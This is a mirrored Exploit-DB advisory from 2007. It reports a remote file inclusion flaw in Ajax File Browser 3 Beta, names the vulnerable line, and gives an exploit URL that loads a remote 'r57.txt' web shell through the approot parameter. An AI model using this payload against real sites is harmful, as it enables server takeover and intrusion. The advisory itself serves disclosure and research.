bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4405.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
1.2 KiB
Text
Raw Blame History

Ajax File Browser 3 Beta Remote File Inclusion
##############################################
found by the "arfis project"
http://arfis.wordpress.com/
Project Info:
-------------
Name: Ajax File Browser
Link: http://sourceforge.net/projects/ajaxfb/
DL: http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip
Vulnerability Info:
-------------------
File: _includes/settings.inc.php
Line: 12
Code: require_once($approot. _includes/functions_file.inc.php );
Exploit Example:
----------------
http://localhost/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://localhost/r57.txt?
About arfis:
------------
"arfis" stands for "automated Remote File Inclusion search". It's a perl script
that automatically download and extract PHP projects from sourceforge.net. It then
checks the project for RFI vulnerabilities, if found one it post's it to the arfis-
blog, or database if you want to call it like that. Feel free to come around and
find your own RFI:
http://arfis.wordpress.com/
# milw0rm.com [2007-09-14]
Reference in a new issue View git blame Copy permalink